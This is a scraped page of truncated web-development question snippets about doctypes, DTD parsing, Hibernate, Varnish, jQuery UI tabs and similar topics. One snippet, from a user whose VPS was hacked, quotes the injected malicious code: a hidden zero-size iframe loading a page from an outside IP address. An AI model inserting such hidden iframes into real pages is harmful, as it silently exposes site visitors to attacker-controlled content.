Ok guys, I give up. Here's the code I'm struggling with:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
…
Hi,
is there a way to configure hibernate3-maven-plugin so that a sequence generator is detected for a primary-key? I'm using a bottom-up approach for hibernate configuration (which means letting hibernate-tools generate the hibernate configuration using a jdbc-connection for you via reverse-engineering on an existing database…
Hi, This is my first post to ask a question on stack overflow and my issue is that when I don't see a client side validation error message when I don't enter any values for that field even when it is configured as required. The input page is reloaded but no error message is seen. I am not sure what I am doing wrong. Any advice…
hi guys,
i'm trying to build a login and main page on dreamweaver for a client and testing them in google chrome and internet explorer but i am running into a lot of unexpected difficulties. the main thing has to be the way the tables are being rendered on the different pages. it seems to appear well on google chrome but when…
hey,
im new to javascript and am intersted in creating a small o3d script:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;…
Possible Duplicate:
My server's been hacked EMERGENCY
My VPS just got hacked an all my pages are being served with an malicious iframe injected just before the html tag.
The code is like this:
<iframe src= http://117.21.247.171:700/1.htm width=0 height=0></iframe> …
I want to generate a robots.txt file using Varnish 2.1.
That means that domain.com/robots.txt is served using Varnish and also subdomain.domain.com/robots.txt is also served using Varnish.
The robots.txt must be hardcoded into default.vcl file. is that possible?
I know Varnish can generate a maintenance page on error.…
I have a problem with ExpressionEngine2 after moving from an old server to WHM/cPanel running on CentOS6.4. Simple test code to reproduce that issue:
<?php
$protocol = strpos(strtolower($_SERVER['SERVER_PROTOCOL']),'https') === FALSE ? 'http' : 'https';
$host = $_SERVER['HTTP_HOST'];
…
I have a site with a 'development' subdomain, which displays my SVG file exactly as intended.
However when I copy it across to www, or any other subdomain (e.g. 'test') some browsers try to open the file in an external editor, therefore asking me to download the file rather than displaying it.
For example:
…
So I want to build a XHTML 1.0 Strict based website. Using Notepad++ for syntax highlighting came as an idea to me. But when I tried to put the XML declaration (as stated in the spec, proper XHTML pages should use a XML declaration and be served as application/xhtml+xml) I can't get the entire document…
Hello, we use in all our pages in the 1st line of our HTML code the:
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
We are moving on to the new IE8 and we would like to keep the DOCTYPE unchanged, is there any suggestions/warnings we…
Imagine you have an XML document and imagine you have the DTD but the document itself doesn't actually specify a DOCTYPE ... How would you insert the DOCTYPE declaration, preferably by specifying it on the parser (similar to how you can set the schema for a document that will be parsed) or by…
I need to implement the survey page using ASP.NET MVC (v.4)
That functionality has already been implemented in our project using ASP.NET WebForms.
(I really searched a lot for real examples of similar functionality implemented via MVC, but failed)
Goal: staying on the same page (in webforms…
I recently changed some of my pages to be displayed via ajax and I am having some confusion as to why the utf8 encoding is now displaying a question mark inside of a box, whereas before it wasn't.
Fore example. The oringal page was index.php. charset was explicitly set to utf8 and is in the…
Hello,
Although probarly quite simple, i cannot seem to find the following.
The form takes certain data, and then represents the data in a table.
Next step i click the hyperlink that takes me back to the form.
Now my question is how exactly do i make it possible when filling in the same…
Hi
I face issue parsing xhtml with DOCTYPE declaration using DOM parser.
Error: java.io.IOException: Server returned HTTP response code: 503 for URL:
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd%20
Is there a way to parse the xhtml to a Document object iognoring the DOCTYPE.
Hi all,
Maybe my question is wired: is there a way to prevent jQueryUI tabs from floating if browser window is too small?
Explanation: I have a simple horizontal tab using CSS only. The content is floating but not the tabs. Important: there is no width set manually, the current width is…
Hi all,
Maybe my question is wired: is there a way to prevent jQueryUI tabs from floating if browser window is too small?
Explanation: I have a simple horizontal tab using CSS only. The content is floating but not the tabs. Important: there is no width set manually, the current width is…
Hi guys,
I have two table a "Module" table and a "StaffModule" I'm wanting to display a list of modules by which staff are present on the staffmodule mapping table.
I've tried
from Module join Staffmodule sm with ID = sm.MID
with no luck, I get the following error
Path Expected…
hi there,
i got a question when i come across the HTML 4.01 DTD:
in the strict DTD, a element is defined as
<!ELEMENT P - O (%inline;)* -- paragraph -->
but somewhat i thought is a block-level, and all(maybe almost) user agents define as a block-level.
so, i just…
I have a named session scoped bean CustomerRegistration which has a named producer method getNewCustomer which returns a Customer object. There is also CustomerListProducer class which produces all customers as list from the database. On the selectCustomer.xhtml page the user is then…
I have an 'overlay.dtd' file with a line like <!ENTITY myentity "myvalue">.
At the top of my xul file I have <!DOCTYPE overlay SYSTEM 'chrome://myaddon/locale/overlay.dtd'>.
In my xul file, I have <script src='myscript.js'>.
I want to know if there is any way to…
Hi ;
We are working on :hover pseudo-class in IE 7, which works only if the docktype is
< !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd"
,but it decrement the font size of all element
please help me…